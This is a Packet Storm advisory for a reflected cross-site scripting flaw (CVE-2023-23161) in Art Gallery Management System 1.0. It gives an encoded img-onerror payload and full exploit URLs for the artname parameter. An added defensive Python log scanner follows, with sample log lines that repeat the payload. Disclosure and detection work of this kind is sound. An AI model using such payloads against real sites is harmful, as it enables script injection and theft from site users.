packetstorm / Rahul Patwari / PACKETSTORM:171642
History: Apr 03, 2023 - 12:00 a.m.

Art Gallery Management System Project 1.0 Cross Site Scripting

2023-04-03 00:00:00
Rahul Patwari
packetstormsecurity.com
Tags: exploit, cross site scripting, reflected, php, cve-2023-23161, proof of concept, alert, security

EPSS: 0.003 (Low), percentile 70.4%

`# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)  
# Date: 20/01/2023  
# Exploit Author: Rahul Patwari  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
# CVE : CVE-2023-23161  
  
# Proof of Concept:  
# 1- Install the application Art Gallery Management System Project v1.0  
  
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints  
  
# 3- Now insert the XSS payload in the artname parameter.  
# The XSS payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E  
  
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E  
  
# 5- XSS has been triggered.  
  
# Go to this url "  
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E  
"  
XSS will trigger.  
  
`
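
A defender's view of the request in steps 4 and 5, as an added example that is not part of the original advisory: a Python scan of web-server access logs for `product.php` requests whose decoded `artname` value contains HTML-significant characters. The log lines are constructed samples, and the combined log format, the function names and the character set treated as suspicious are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Apr/2023:10:00:01 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints HTTP/1.1" 200 5120
203.0.113.9 - - [03/Apr/2023:10:00:07 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1" 200 5188
203.0.113.6 - - [03/Apr/2023:10:00:09 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=2&artname=oil+paintings HTTP/1.1" 200 5101
203.0.113.7 - - [03/Apr/2023:10:00:12 +0000] "GET /Art-Gallery-MS-PHP/index.php?artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1" 200 900
"""

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a category name never needs these characters; each of them can
# change the HTML context if the value is echoed back without encoding.
MARKUP_RE = re.compile(r"[<>\"'`]")


def suspicious_artname(log_line):
    """Return the decoded artname value when the line is a product.php request
    whose artname contains HTML-significant characters, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # The advisory was tested on XAMPP / Windows, where paths are case-insensitive.
    if not url.path.lower().endswith("/product.php"):
        return None
    # parse_qsl percent-decodes each value and skips the empty pair left by "&&".
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "artname" and MARKUP_RE.search(value):
            return value
    return None


def scan(log_text):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        value = suspicious_artname(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: artname={value!r}")
```

A hit only shows that markup was sent to the parameter; whether it executed depends on whether the installed `product.php` encodes `artname` on output.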
